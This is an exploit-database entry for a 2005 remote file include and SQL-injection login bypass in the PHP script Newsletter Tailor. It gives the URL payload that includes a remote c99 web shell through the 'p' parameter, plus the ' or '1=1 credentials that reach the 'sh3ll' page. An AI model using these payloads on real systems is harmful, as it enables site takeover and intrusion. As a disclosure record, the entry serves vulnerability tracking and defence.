header-logo
Suggest Exploit
vendor:
Newsletter Tailor
by:
Snakespc
8,8
CVSS
HIGH
Remote File Include
95
CWE
Product Name: Newsletter Tailor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Newsletter Tailor Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'p' parameter of the 'index.php' script. A remote attacker can execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request with a malicious 'p' parameter value. Additionally, an authentication bypass vulnerability exists due to an SQL injection in the 'user' and 'pass' parameters of the 'index.php' script. A remote attacker can bypass authentication and gain access to the 'sh3ll' page by sending a specially crafted HTTP request with malicious 'user' and 'pass' parameter values.

Mitigation:

Input validation should be used to prevent the execution of malicious code. Additionally, authentication should be implemented using secure methods such as hashing and salting.
Source

Exploit-DB raw data:

==============================================================================
[»] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
 
[»] Script:   [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note:     [ Thank you ViRuSMaN on script  ]
 
###########################################################################
 ===[ Exploit ]=== include($p.".php");
 
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <- 
###########################################################################

Navigation

Suggest Exploit

Services By CQR